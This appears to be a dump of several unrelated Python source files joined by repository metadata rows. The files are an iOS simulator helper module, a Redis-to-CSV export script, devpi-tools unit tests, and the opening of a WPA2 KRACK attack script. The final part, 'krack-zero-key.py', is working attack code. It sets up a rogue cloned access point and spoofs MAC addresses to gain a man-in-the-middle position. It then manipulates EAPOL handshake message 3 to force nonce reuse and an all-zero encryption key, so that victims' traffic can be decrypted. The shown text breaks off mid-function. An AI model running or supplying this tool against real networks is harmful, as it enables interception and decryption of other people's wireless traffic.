device_type = GetLastSupportedIphoneSimType(os_version)
else:
_ValidateSimulatorTypeWithOsVersion(device_type, os_version)
if not name_prefix:
name_prefix = 'New'
name = '%s-%s-%s' % (name_prefix, device_type, os_version)
# Example
# Runtime ID of iOS 10.2: com.apple.CoreSimulator.SimRuntime.iOS-10-2
runtime_id = _PREFIX_RUNTIME_ID + os_type + '-' + os_version.replace('.', '-')
logging.info('Creating a new simulator:\nName: %s\nOS: %s %s\nType: %s', name,
os_type, os_version, device_type)
for i in range(0, _SIM_OPERATION_MAX_ATTEMPTS):
try:
new_simulator_id = RunSimctlCommand(
['xcrun', 'simctl', 'create', name, device_type, runtime_id])
except ios_errors.SimError as e:
raise ios_errors.SimError('Failed to create simulator: %s' % str(e))
new_simulator_obj = Simulator(new_simulator_id)
# After creating a new simulator, its state is CREATING. When the
# simulator's state becomes SHUTDOWN, the simulator is created.
try:
new_simulator_obj.WaitUntilStateShutdown(
_SIMULATOR_CREATING_TO_SHUTDOWN_TIMEOUT_SEC)
logging.info('Created new simulator %s.', new_simulator_id)
return new_simulator_id, device_type, os_version, name
except ios_errors.SimError as error:
logging.debug('Failed to create simulator %s: %s.', new_simulator_id,
error)
logging.debug('Deleted half-created simulator %s.', new_simulator_id)
new_simulator_obj.Delete()
if i != _SIM_OPERATION_MAX_ATTEMPTS - 1:
logging.debug('Will sleep %ss and retry again.',
_SIM_ERROR_RETRY_INTERVAL_SEC)
# If the simulator's state becomes SHUTDOWN, there may be something
# wrong in CoreSimulatorService. Sleeps a short interval(2s) can help
# reduce flakiness.
time.sleep(_SIM_ERROR_RETRY_INTERVAL_SEC)
raise ios_errors.SimError('Failed to create simulator in %d attempts.' %
_SIM_OPERATION_MAX_ATTEMPTS)
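# --- Added usage sketch (not part of the original module) -------------------
# A hedged example of CreateNewSimulator; the device type and OS version must
# be ones reported as supported by the local Xcode, so treat these particular
# values as illustrative.
def _create_new_simulator_example():
  sim_id, device_type, os_version, name = CreateNewSimulator(
      device_type='iPhone 6', os_version='10.2', name_prefix='Test')
  logging.info('Created %s (%s, iOS %s) with id %s',
               name, device_type, os_version, sim_id)
  return Simulator(sim_id)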
def GetSupportedSimDeviceTypes(os_type=None):
"""Gets the name list of supported simulator device types of given OS type.
If os_type is not provided, it will return all supported simulator device
  types. The names are taken from the output of `xcrun simctl list devicetypes`,
  so some simulator device type names may differ between Xcode versions.
E.g., the name of iPad Pro (12.9-inch) in Xcode 7.2.1 is "iPad Pro", but it is
"iPad Pro (12.9-inch)" in Xcode 8+.
Args:
os_type: shared.ios_constants.OS, OS type of simulator, such as iOS,
watchOS, tvOS.
Returns:
a list of string, each item is a simulator device type.
E.g., ["iPhone 5", "iPhone 6 Plus"]
"""
# Example output:
# {
# "devicetypes" : [
# {
# "name" : "iPhone 5",
# "identifier" : "com.apple.CoreSimulator.SimDeviceType.iPhone-5"
# }
# ]
# }
#
# See more examples in testdata/simctl_list_devicetypes.json
sim_types_infos_json = json.loads(
RunSimctlCommand(('xcrun', 'simctl', 'list', 'devicetypes', '-j')))
sim_types = []
for sim_types_info in sim_types_infos_json['devicetypes']:
sim_type = sim_types_info['name']
if (os_type is None or
(os_type == ios_constants.OS.IOS and sim_type.startswith('i')) or
(os_type == ios_constants.OS.TVOS and 'TV' in sim_type) or
(os_type == ios_constants.OS.WATCHOS and 'Watch' in sim_type)):
sim_types.append(sim_type)
return sim_types
def GetLastSupportedIphoneSimType(os_version):
""""Gets the last supported iPhone simulator type of the given OS version.
Currently, the last supported iPhone simulator type is the last iPhone from
the output of `xcrun simctl list devicetypes`.
Args:
os_version: string, OS version of the new simulator. The format is
{major}.{minor}, such as 9.3, 10.2.
Returns:
a string, the last supported iPhone simulator type.
Raises:
ios_errors.SimError: when there is no supported iPhone simulator type.
"""
supported_sim_types = GetSupportedSimDeviceTypes(ios_constants.OS.IOS)
supported_sim_types.reverse()
os_version_float = float(os_version)
for sim_type in supported_sim_types:
if sim_type.startswith('iPhone'):
min_os_version_float = float(
simtype_profile.SimTypeProfile(sim_type).min_os_version)
if os_version_float >= min_os_version_float:
return sim_type
raise ios_errors.SimError('Can not find supported iPhone simulator type.')
def GetSupportedSimOsVersions(os_type=ios_constants.OS.IOS):
"""Gets the supported version of given simulator OS type.
Args:
os_type: shared.ios_constants.OS, OS type of simulator, such as iOS,
watchOS, tvOS.
Returns:
a list of string, each item is an OS version number. E.g., ["10.1", "11.0"]
"""
if os_type is None:
os_type = ios_constants.OS.IOS
# Example output:
# {
# "runtimes" : [
# {
# "bundlePath" : "\/Applications\/Xcode10.app\/Contents\/Developer\
# /Platforms\/iPhoneOS.platform\/Developer\/Library\
# /CoreSimulator\/Profiles\/Runtimes\/iOS.simruntime",
# "availabilityError" : "",
# "buildversion" : "16A366",
# "availability" : "(available)",
# "isAvailable" : true,
# "identifier" : "com.apple.CoreSimulator.SimRuntime.iOS-12-0",
# "version" : "12.0",
# "name" : "iOS 12.0"
# }
# }
# See more examples in testdata/simctl_list_runtimes.json
xcode_version_num = xcode_info_util.GetXcodeVersionNumber()
sim_runtime_infos_json = json.loads(
RunSimctlCommand(('xcrun', 'simctl', 'list', 'runtimes', '-j')))
sim_versions = []
for sim_runtime_info in sim_runtime_infos_json['runtimes']:
# Normally, the json does not contain unavailable runtimes. To be safe,
# also checks the 'availability' field.
if 'availability' in sim_runtime_info and sim_runtime_info[
'availability'].find('unavailable') >= 0:
continue
elif 'isAvailable' in sim_runtime_info and not sim_runtime_info[
'isAvailable']:
continue
listed_os_type, listed_os_version = sim_runtime_info['name'].split(' ', 1)
if listed_os_type == os_type:
# `bundlePath` key may not exist in the old Xcode/macOS version.
if 'bundlePath' in sim_runtime_info:
runtime_path = sim_runtime_info['bundlePath']
info_plist_object = plist_util.Plist(
os.path.join(runtime_path, 'Contents/Info.plist'))
min_xcode_version_num = int(info_plist_object.GetPlistField('DTXcode'))
if xcode_version_num >= min_xcode_version_num:
sim_versions.append(listed_os_version)
else:
if os_type == ios_constants.OS.IOS:
ios_major_version, ios_minor_version = listed_os_version.split('.', 1)
          # Ignores the potential build version
ios_minor_version = ios_minor_version[0]
ios_version_num = int(ios_major_version) * 100 + int(
ios_minor_version) * 10
# One Xcode version always maps to one max simulator's iOS version.
# The rules is almost max_sim_ios_version <= xcode_version + 200.
# E.g., Xcode 8.3.1/8.3.3 maps to iOS 10.3, Xcode 7.3.1 maps to iOS
# 9.3.
if ios_version_num > xcode_version_num + 200:
continue
sim_versions.append(listed_os_version)
return sim_versions
def GetLastSupportedSimOsVersion(os_type=ios_constants.OS.IOS,
device_type=None):
"""Gets the last supported version of given arguments.
If device_type is given, will return the last supported OS version of the
device type. Otherwise, will return the last supported OS version of the
OS type.
Args:
os_type: shared.ios_constants.OS, OS type of simulator, such as iOS,
watchOS, tvOS.
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
Returns:
a string, the last supported version.
Raises:
ios_errors.SimError: when there is no supported OS version of the given OS.
ios_errors.IllegalArgumentError: when the supported OS version can not match
the given simulator type.
"""
supported_os_versions = GetSupportedSimOsVersions(os_type)
if not supported_os_versions:
raise ios_errors.SimError('Can not find supported OS version of %s.' %
os_type)
if not device_type:
return supported_os_versions[-1]
simtype_max_os_version_float = float(
simtype_profile.SimTypeProfile(device_type).max_os_version)
supported_os_versions.reverse()
for os_version in supported_os_versions:
if float(os_version) <= simtype_max_os_version_float:
return os_version
  # No supported OS version matched the simulator type's max OS version.
  raise ios_errors.IllegalArgumentError(
      'The supported OS versions %s can not match simulator type %s. Because '
      'its max OS version is %s' %
      (supported_os_versions, device_type, simtype_max_os_version_float))
def GetOsType(device_type):
"""Gets the OS type of the given simulator.
  This method may not work correctly if the device_type is invalid. Please call
simulator_util.ValidateSimulatorType(device_type, os_version) to validate
it first.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
Returns:
shared.ios_constants.OS.
Raises:
ios_errors.IllegalArgumentError: when the OS type of the given simulator
device type can not be recognized.
"""
if device_type.startswith('i'):
return ios_constants.OS.IOS
if 'TV' in device_type:
return ios_constants.OS.TVOS
if 'Watch' in device_type:
return ios_constants.OS.WATCHOS
raise ios_errors.IllegalArgumentError(
'Failed to recognize the os type for simulator device type %s.' %
device_type)
def _ValidateSimulatorType(device_type):
"""Checks if the simulator type is valid.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
Raises:
ios_errors.IllegalArgumentError: when the given simulator device type is
invalid.
"""
supported_sim_device_types = GetSupportedSimDeviceTypes()
if device_type not in supported_sim_device_types:
raise ios_errors.IllegalArgumentError(
'The simulator device type %s is not supported. Supported simulator '
'device types are %s.' % (device_type, supported_sim_device_types))
def _ValidateSimulatorTypeWithOsVersion(device_type, os_version):
"""Checks if the simulator type with the given os version is valid.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
os_version: string, OS version of the new simulator. The format is
{major}.{minor}, such as 9.3, 10.2.
Raises:
ios_errors.IllegalArgumentError: when the given simulator device type can
not match the given OS version.
"""
os_version_float = float(os_version)
sim_profile = simtype_profile.SimTypeProfile(device_type)
min_os_version_float = float(sim_profile.min_os_version)
if min_os_version_float > os_version_float:
raise ios_errors.IllegalArgumentError(
'The min OS version of %s is %s. But current OS version is %s' %
(device_type, min_os_version_float, os_version))
max_os_version_float = float(sim_profile.max_os_version)
if max_os_version_float < os_version_float:
raise ios_errors.IllegalArgumentError(
'The max OS version of %s is %s. But current OS version is %s' %
(device_type, max_os_version_float, os_version))
def QuitSimulatorApp():
"""Quits the Simulator.app."""
if xcode_info_util.GetXcodeVersionNumber() >= 700:
simulator_name = 'Simulator'
else:
simulator_name = 'iOS Simulator'
subprocess.Popen(['killall', simulator_name],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def IsAppFailedToLaunchOnSim(sim_sys_log, app_bundle_id=''):
"""Checks if the app failed to launch on simulator.
If app_bundle_id is not provided, will check if any UIKitApplication failed
to launch on simulator.
Args:
sim_sys_log: string, the content of the simulator's system.log.
app_bundle_id: string, the bundle id of the app.
Returns:
True if the app failed to launch on simulator.
"""
pattern = re.compile(_PATTERN_APP_CRASH_ON_SIM % app_bundle_id)
return pattern.search(sim_sys_log) is not None
def IsXctestFailedToLaunchOnSim(sim_sys_log):
"""Checks if the xctest process failed to launch on simulator.
Args:
sim_sys_log: string, the content of the simulator's system.log.
Returns:
True if the xctest process failed to launch on simulator.
"""
pattern = re.compile(_PATTERN_XCTEST_PROCESS_CRASH_ON_SIM)
return pattern.search(sim_sys_log) is not None
def IsCoreSimulatorCrash(sim_sys_log):
"""Checks if CoreSimulator crashes.
Args:
sim_sys_log: string, the content of the simulator's system.log.
Returns:
True if the CoreSimulator crashes.
"""
pattern = re.compile(_PATTERN_CORESIMULATOR_CRASH)
return pattern.search(sim_sys_log) is not None
def RunSimctlCommand(command):
"""Runs simctl command."""
for i in range(_SIMCTL_MAX_ATTEMPTS):
process = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if ios_constants.CORESIMULATOR_CHANGE_ERROR in stderr:
output = stdout
else:
output = '\n'.join([stdout, stderr])
output = output.strip()
if process.poll() != 0:
if (i < (_SIMCTL_MAX_ATTEMPTS - 1) and
ios_constants.CORESIMULATOR_INTERRUPTED_ERROR in output):
continue
raise ios_errors.SimError(output)
return output
| 38.70614 | 80 | 0.699906 |
5fe5dfa277b0f8ac2da857db2b1f7b9e4c14e0cb | 1,382 | py | Python | main.py | snosan-tools/avurnavs-csv | 89a18c7b278ff94540620c0a2545ba0c039b7153 | [
"MIT"
] | null | null | null | main.py | snosan-tools/avurnavs-csv | 89a18c7b278ff94540620c0a2545ba0c039b7153 | [
"MIT"
] | null | null | null | main.py | snosan-tools/avurnavs-csv | 89a18c7b278ff94540620c0a2545ba0c039b7153 | [
"MIT"
] | null | null | null | import json
import os
import redis as redis_lib
import requests
import pandas as pd
REGIONS = ['atlantique', 'manche', 'méditerranée']
r = requests.get(
'https://api.heroku.com/apps/avurnav/config-vars',
headers={
'Accept': 'application/vnd.heroku+json; version=3',
'Authorization': 'Bearer ' + os.environ['HEROKU_TOKEN']
}
)
r.raise_for_status()
redis = redis_lib.utils.from_url(r.json()['REDIS_URL'])
avurnavs = []
for region in REGIONS:
keys = redis.keys(region + ':*')
data = list(map(lambda e: json.loads(e), redis.mget(keys)))
avurnavs.extend(data)
df = pd.DataFrame(avurnavs)
df.rename(
columns={
'content': 'contenu',
'premar_region': 'region_prefecture_maritime',
'title': 'titre',
'valid_from': 'date_debut_vigueur',
'valid_until': 'date_fin_vigueur',
'number': 'numero_avurnav'
},
inplace=True
)
df = df[[
'id', 'region_prefecture_maritime', 'numero_avurnav',
'latitude', 'longitude', 'titre', 'contenu',
'date_debut_vigueur', 'date_fin_vigueur'
]]
# We could have duplicates because in the new
# version of the Préfet maritime websites they
# don't expose the ID column
df.drop_duplicates(
subset=['region_prefecture_maritime', 'numero_avurnav'],
keep='first',
inplace=True
)
df.to_csv('avurnavs.csv', index=False, float_format='%.10g')
| 24.678571 | 63 | 0.664255 |
cccf0570c63b10784e43d48a5a84f393463ff479 | 2,789 | py | Python | tests/test_devpi_request.py | bcicen/devpi-tools | 0f1844b4e5c9d7da2b21908ca2ff5c1593c564e4 | [
"MIT"
] | 7 | 2017-03-10T15:30:11.000Z | 2022-02-08T09:24:56.000Z | tests/test_devpi_request.py | bcicen/devpi-api-client | 0f1844b4e5c9d7da2b21908ca2ff5c1593c564e4 | [
"MIT"
] | 5 | 2020-01-12T22:01:00.000Z | 2021-07-30T10:51:16.000Z | tests/test_devpi_request.py | bcicen/devpi-api-client | 0f1844b4e5c9d7da2b21908ca2ff5c1593c564e4 | [
"MIT"
] | 2 | 2019-10-27T23:21:13.000Z | 2020-08-26T00:13:33.000Z | import json
from devpi_tools import DevpiClient
def mock_get_json_index(self, path, method='GET', **params):
return {
"root": {
"indexes": {
"pypi": {
"type": "mirror",
"volatile": False,
"title": "PyPI",
"mirror_url": "https://pypi.org/simple/",
"mirror_web_url_fmt": "https://pypi.org/project/{name}/"
},
},
"username": "root"
}
}
def mock_get_projects_json(self, path, method='GET', **params):
return {
"type": "stage",
"volatile": True,
"acl_upload": [
"root",
],
"acl_toxresult_upload": [
":ANONYMOUS:"
],
"bases": [],
"mirror_whitelist": [],
"pypi_whitelist": [],
"projects": [
"devpi-tools"
]
}
def mock_get_project_json(self, path, method='GET', **params):
json_file_path = './files/project.json'
with open(json_file_path) as f:
json_dict = json.load(f)
return json_dict
def mock_get_version_json(self, path, method='GET', **params):
json_file_path = './files/version.json'
with open(json_file_path, 'r') as f:
json_dict = json.load(f)
return json_dict
def test_devpi_request_indexes(monkeypatch):
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_json_index)
client = DevpiClient('http://127.0.0.1:3141')
list_indexes = client.indexes()
assert len(list_indexes) == 1
assert list_indexes[0].name == "pypi"
index = client.index('/root/pypi')
assert index.user == "root"
def test_devpi_request_projects(monkeypatch):
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_json_index)
client = DevpiClient('http://127.0.0.1:3141')
index = client.index('/root/pypi')
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_projects_json)
list_projects = index.projects()
assert len(list_projects) == 1
assert list_projects[0].path == "/root/pypi/devpi-tools"
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_project_json)
project = index.project('devpi-tools')
assert project.path == "/root/pypi/devpi-tools"
def test_devpi_request_version(monkeypatch):
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_json_index)
client = DevpiClient('http://127.0.0.1:3141')
index = client.index('/root/pypi')
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_project_json)
project = index.project('devpi-tools')
monkeypatch.setattr(DevpiClient, 'get_json', mock_get_version_json)
version = project.version('0.0.1')
assert version.path == "/root/pypi/devpi-tools/0.0.1"
assert version.version == "0.0.1"
assert version.author == "Bradley Cicenas"
| 30.988889 | 72 | 0.625672 |
b68539bd2f7bb353b5fd3b76574b0ccfda1a24c8 | 542 | py | Python | easy-queue/modules/eqobject-service/eqobject/eqobject/api/status/endpoints/status.py | ebustosm6/easy-queue | 29ef23f6a686df0c9bb4ab85df7233b3ee64dc0d | [
"Apache-2.0"
] | null | null | null | easy-queue/modules/eqobject-service/eqobject/eqobject/api/status/endpoints/status.py | ebustosm6/easy-queue | 29ef23f6a686df0c9bb4ab85df7233b3ee64dc0d | [
"Apache-2.0"
] | null | null | null | easy-queue/modules/eqobject-service/eqobject/eqobject/api/status/endpoints/status.py | ebustosm6/easy-queue | 29ef23f6a686df0c9bb4ab85df7233b3ee64dc0d | [
"Apache-2.0"
] | null | null | null | import logging
from http import HTTPStatus
from flask import request
from flask_restplus import Resource
from eqobject.api.restplus import api
from easyqueue.core.base import EQObject, schema_eqobject
log = logging.getLogger(__name__)
ns = api.namespace('status', description='Health check')
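# Liveness endpoint: a GET on the status/health route simply reports {"status": "OK"}.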
@ns.route('/health')
class StatusEndpoint(Resource):
@api.response(HTTPStatus.INTERNAL_SERVER_ERROR, 'Unexpected server error.')
def get(self):
"""
Returns OK
"""
return dict(status="OK"), HTTPStatus.OK
| 22.583333 | 79 | 0.726937 |
2b72a86ab1bca48641dbb15c1822c1a536fa1808 | 28,931 | py | Python | krackattack/krack-zero-key.py | DreadsCasey/Krackattack | 4278e2aae10b013c06f40b653fda3441f2c6a73a | [
"BSD-3-Clause"
] | null | null | null | krackattack/krack-zero-key.py | DreadsCasey/Krackattack | 4278e2aae10b013c06f40b653fda3441f2c6a73a | [
"BSD-3-Clause"
] | null | null | null | krackattack/krack-zero-key.py | DreadsCasey/Krackattack | 4278e2aae10b013c06f40b653fda3441f2c6a73a | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2017, Adam Casey-Rerhaye
#
# This code may be distributed under the terms of the BSD license.
# See README for more details.
"""
Usage:
krack-zero-key.py -k <rouge_interface> <interface> <ssid> [--target <target_client>] [-v | --vv]
krack-zero-key.py -s <rouge_interface> <interface> [<ssid>] [-v]
krack-zero-key.py -r <rouge_interface> <interface>
krack-zero-key.py -h | --help
krack-zero-key.py --disable-hw
Options:
  -k...................Perform a key-reinstallation attack
  -v...................Verbose output (shows the pink debug messages) - optional.
  --vv.................Even more verbose output. WARNING: there's a lot of output!
  -r...................Reset/restart services and close the rogue AP.
-h, --help...........Displays this message.
interface............The interface used.
  rouge_interface......The interface used on the rogue channel.
  ssid.................The SSID of the network to be cloned (spaces should be replaced by '/').
--target.............Target client to exploit. This script will work better with a specific target - optional.
--disable-hw.........Disables hardware encryption.
Make sure to have all the dependencies installed (see README for details)
To compile hostapd, open a terminal in the hostapd dir:
cp defconfig .config
make -j 2
You may need to disable hardware encryption;
use --disable-hw to do so, then reboot for it to take effect
If the error "Too many files open in system" occurs, run with the -r option to reset
the interface configuration.
"""
import sys, time, os, subprocess, shlex, socket, struct, string, heapq, textwrap, fileinput
from docopt import docopt
from wpaspy import *
from libclass import *
from scapy.all import *
IEEE_TLV_TYPE_SSID = 0
IEEE_TLV_TYPE_CHANNEL = 3
IEEE_TLV_TYPE_RSN = 48
IEEE_TLV_TYPE_CSA = 37
IEEE_TLV_TYPE_VENDOR = 221
HANDSHAKE_TRANSMIT_INTERVAL = 2
IEEE80211_RADIOTAP_RATE = (1 << 2)
IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
#Master functions:
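#Spoof the MAC address of an interface: bring it down, change the address with macchanger, then bring it back up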
def set_mac_address(iface, macaddr):
subprocess.check_output(["ifconfig", iface, "down"])
try:
subprocess.check_output(["macchanger", "-m", macaddr, iface])
except subprocess.CalledProcessError, ex:
if not "It's the same MAC!!" in ex.output:
raise
subprocess.check_output(["ifconfig", iface, "up"])
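#Placeholder for sending commands over the hostapd control interface (not implemented yet)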
def hostapd_command(hostapd_ctrl, cmd):
pass
def disable_hwcrypto():
log(INFO, 'Disabling hardware encryption')
subprocess.check_output(['./disable-hwcrypto.sh'])
#Class to configure the hostapd network to clone the real AP
#Credit to Mathy Vanhoef for providing what info is needed
class Network_Config:
def __init__(self):
self.ssid = None
self.real_channel = None
self.rouge_channel = None
self.group_cipher = None
self.wpavers = 0
self.pairwise_ciphers = set()
self.akms = set()
self.wmmenabled = 0
self.capab = 0
#check if the target network is actually a WPA1/2 RSN
def check_wparsn(self):
return not self.group_cipher is None and self.wpavers > 0 and \
len(self.pairwise_ciphers) > 0 and len(self.akms) > 0
def parse_wpa_rsn(self, wparsn):
self.group_cipher = ord(wparsn[5])
num_pairwise = struct.unpack("<H", wparsn[6:8])[0]
pos = wparsn[8:]
for i in range(num_pairwise):
self.pairwise_ciphers.add(ord(pos[3]))
pos = pos[4:]
num_akm = struct.unpack("<H", pos[:2])[0]
pos = pos[2:]
for i in range(num_akm):
self.akms.add(ord(pos[3]))
pos = pos[4:]
if len(pos) >= 2:
self.capab = struct.unpack("<H", pos[:2])[0]
#extract the useful info from the beacon probe
def get_beacon_info(self, p):
el = p[Dot11Elt]
while isinstance(el, Dot11Elt):
if el.ID == IEEE_TLV_TYPE_SSID:
self.ssid = el.info
elif el.ID == IEEE_TLV_TYPE_CHANNEL:
self.real_channel = ord(el.info[0])
elif el.ID == IEEE_TLV_TYPE_RSN:
self.parse_wpa_rsn(el.info)
self.wpavers |= 2
elif el.ID == IEEE_TLV_TYPE_VENDOR and el.info[:4] == "\x00\x50\xf2\x01":
self.parse_wpa_rsn(el.info[4:])
self.wpavers |= 1
elif el.ID == IEEE_TLV_TYPE_VENDOR and el.info[:4] == "\x00\x50\xf2\x02":
self.wmmenabled = 1
el = el.payload
def get_rouge_channel(self):
return self.rouge_channel
#writes the config file for hostapd to use
def write_config(self, iface):
self.rouge_channel = 1 if self.real_channel >= 6 else 11
log(DEBUG, 'Rouge channel is: %s'%str(self.rouge_channel))
CONFIG = """
ctrl_interface=hostapd_ctrl
ctrl_interface_group=0
interface={iface}
ssid={ssid}
channel={channel}
wpa={wpaver}
wpa_key_mgmt={akms}
wpa_pairwise={pairwise}
rsn_pairwise={pairwise}
rsn_ptksa_counters={ptksa_counters}
rsn_gtksa_counters={gtksa_counters}
wmm_enabled={wmmenabled}
wmm_advertised={wmmadvertised}
hw_mode=g
auth_algs=3
wpa_passphrase=XXXXXXXX"""
akm2str = {2: "WPA-PSK", 1: "WPA-EAP"}
ciphers2str = {2: "TKIP", 4: "CCMP"}
return CONFIG.format(
iface = iface,
ssid = self.ssid,
channel = self.rouge_channel,
wpaver = self.wpavers,
akms = " ".join([akm2str[idx] for idx in self.akms]),
pairwise = " ".join([ciphers2str[idx] for idx in self.pairwise_ciphers]),
ptksa_counters = (self.capab & 0b001100) >> 2,
gtksa_counters = (self.capab & 0b110000) >> 4,
wmmadvertised = 1, #int(args.group), #no group args would be 0
wmmenabled = self.wmmenabled)
#This class represents a client object that we can man-in-the-middle
#and use to store the state and data of the connected client
class Client:
Initializing, Connecting, GotMitm, Attack_Started, Success_Reinstalled, Success_AllzeroKey, Failed = range(7)
def __init__(self, macaddr, utils):
self.macaddr = macaddr
self.utils = utils
self.reset()
def reset(self):
self.state = Client.Initializing
self.keystreams = dict()
self.attack_max_iv = None
self.attack_time = None
self.assocreq = None
self.msg1 = None
self.msg2 = None
self.msg3s = []
self.msg4 = None
self.krack_finished = False
def set_msg1(self, msg1):
self.msg1 = msg1
def write_state(self, state):
if state == 0: return 'Initializing'
if state == 1: return 'Connecting'
if state == 2: return 'GotMitm'
if state == 3: return 'Attack_Started'
if state == 4: return 'Success_Reinstalled'
if state == 5: return 'Success_AllzeroKey'
if state == 6: return 'Failed'
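	#Extracts the 64-bit replay counter from the EAPOL layer of a frame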
def get_replay_num(self, p):
return struct.unpack('>Q', str(p[EAPOL])[9:17])[0]
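	#Note: despite its name, set_state only checks whether the client is currently in the given state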
def set_state(self, state):
return self.state == state
def add_new_msg3(self, msg3):
		#simply adds any new msg3's to the list
if self.get_replay_num(msg3) in [self.get_replay_num(p) for p in self.msg3s]:
return
self.msg3s.append(msg3)
def update_clientstate(self, state):
log(DEBUG, 'Client (%s) state has moved to %s'%(self.macaddr, self.write_state(self.state)))
self.state = state
def mark_got_mitm(self):
if self.state == Client.Connecting or self.state == Client.Initializing:
self.state = Client.GotMitm
			log(STATUS, 'Man-in-the-Middle position established against client (%s). Moved to stage %s'%(self.macaddr, self.write_state(self.state)))
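	#While the client is still connecting, only forward auth/assoc, EAPOL msg1-3 and action frames;
	#once a key reinstallation succeeded, forward everything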
def should_forward(self, p):
if self.state in [Client.Connecting, Client.GotMitm, Client.Attack_Started]:
return Dot11Auth in p or Dot11AssoReq in p or Dot11AssoResp in p or\
(1 <= get_eapol_msg_num(p) and get_eapol_msg_num(p) <= 3)\
or (p.type == 0 and p.subtype == 13)
return self.state in [Client.Success_Reinstalled]
def save_iv_keystream(self, iv, keystream):
self.keystreams[iv] = keystream
def get_keystream(self, iv):
return self.keystreams[iv]
def is_iv_reused(self, iv):
return self.set_state(Client.Attack_Started) and iv in self.keystreams
def attack_start(self):
#gets the latest IV
self.attack_max_iv = 0 if len(self.keystreams.keys()) == 0 else max(self.keystreams.keys())
#log the start of the attack time
self.attack_time = time.time()
#update the state
self.update_clientstate(Client.Attack_Started)
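	#The attack attempt is abandoned if no nonce reuse is observed within roughly 1.5 seconds of starting it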
def attack_timeout(self, iv):
return self.set_state(Client.Attack_Started) and self.attack_time + 1.5 < time.time() and self.attack_max_iv < iv
class KrackAttack:
def __init__(self, rouge_interface, interface, target_client, ssid, log, big_verbose, sniffer):
#these 3 varibles contain system arg's pasred from command line
#they specify which function(s) to run
self.big_verbose = big_verbose
self.rouge_iface = rouge_interface
self.iface = interface
self.iface_mon = None
self.rouge_iface_mon = None
self.rouge_mac = None
self.iface_client_ack = None
self.sniff = sniffer
#if there is a target client then this just cleans up the mac addr if needed
self.t_clientmac = None if target_client is None else target_client
self.ssid = ssid
self.Clients = dict()
self.ap_mac_addr = None
self.ivs = IvCollection()
self.rouge_channel = None
self.clientMac = None
self.dhcp = None
self.rouge_sock = None
self.f_sock = None
self.hostapd = None
self.hostapd_ctrl = None
self.ip_forward = None
self.group_ip = None
self.group_arp = None
self.TK = None
self.beacon = None
self.real_ap_mac = None
self.utils = None
self.disas_queue = []
self.null_frames = []
def config_internet(self, iface, eth_iface='eth0'):
log(INFO, 'Forwarding internet through %s'%eth_iface)
subprocess.call(['rm', '-r', './enable_internet_forwarding.sh', eth_iface, iface])
def finish_attack(self, client):
if client.assocreq is None:
			log(WARNING, '''No association request was captured from client (%s), cannot pass client to rogue hostapd to handle'''%client.macaddr)
return
#adding the client to hostapd
log(INFO, 'Registering client with rouge hostapd')
p = Dot11(addr1=self.real_ap_mac, addr2=client.macaddr, addr3=self.real_ap_mac)/Dot11Auth(seqnum=1)
self.hostapd_ctrl.request("RX_MGMT "+ str(p[Dot11]).encode('hex'))
#send the encryption algorithm too
self.hostapd_ctrl.request("RX_MGMT "+str(client.assocreq[Dot11]).encode('hex'))
#tell hostapd that the handshake is finished
self.hostapd_ctrl.request("FINISH_4WAY %s"%client.macaddr)
def handle_from_pairwise(self, client, p):
#this sequence is to strip the frame check sequence as scapy can't handle it
#(only 4 bytes to skip)
plaintext = "\xaa\xaa\x03\x00\x00\x00"
encrypted = p[Dot11WEP].wepdata[4:4+len(plaintext)]
keystream = self.utils.xorstr(plaintext, encrypted)
iv = dot11_get_iv(p)
#check fo IV and then keystream reuse
if client.is_iv_reused(iv):
			#if the keystream from the client object is the same as the keystream from the frame received then
			#we have a normal key reinstallation
if keystream == client.get_keystream(iv):
				log(STATUS, '''KEYSTREAM and NONCE reuse detected! (IV=%s)'''%iv)
client.update_clientstate(Client.Success_Reinstalled)
				#to finish the handshake and give the client an IP
if client.msg4 is not None:
self.f_sock.send(client.msg4)
self.utils.print_packet(STATUS, 'Rouge Channel', client.msg4, suffix='-- Finishing Auth')
					log(STATUS, '''Sending EAPOL msg4 to finish the "authentication"''')
#If the keystream isn't the same then the client has installed a new key
#(hopefully an all zero key)
else:
log(STATUS, '''NONCE reuse detected! Testing for an all-zero key (IV=%s)'''%iv)
				#attempts to decrypt the frame and check whether the first 6 bytes are as expected when an
				#all-zero key is used
if decrypt_ccmp(p, '\x00'*16).startswith('\xAA\xAA\x03\x00\x00\x00'):
					log(STATUS, 'SUCCESS! All-zero key is being used! Packets can now be decrypted!')
client.update_clientstate(Client.Success_AllzeroKey)
else:
					#otherwise it's a normal key reinstallation
client.update_clientstate(Client.Success_Reinstalled)
self.finish_attack(client)
		#if clients are completely patched, or the attack is taking too long, then we'll mark
		#the client as failed
elif client.attack_timeout(iv):
			log(ERROR, 'Attack against client (%s) failed.'%client.macaddr)
client.update_clientstate(Client.Failed)
#saves the keystream so we can compare it next frame
client.save_iv_keystream(iv, keystream)
def handle_to_pairwise(self, client, p):
eapol_num = get_eapol_msg_num(p)
#Saves msg1 for later use
if eapol_num == 1 and client.state in [Client.Connecting, Client.GotMitm]:
log(DEBUG, 'Got Msg1!')
client.set_msg1(p)
elif eapol_num == 3 and client.state in [Client.Connecting, Client.GotMitm]:
client.add_new_msg3(p)
#We need to send at least 2 msg3's to the client, once we do, we can forward them
if len(client.msg3s) >= 2:
log(STATUS, '''Got at least 2 EAPOL message 3's!''')
				log(STATUS, '''Performing a key reinstallation attack against client: %s'''%client.macaddr)
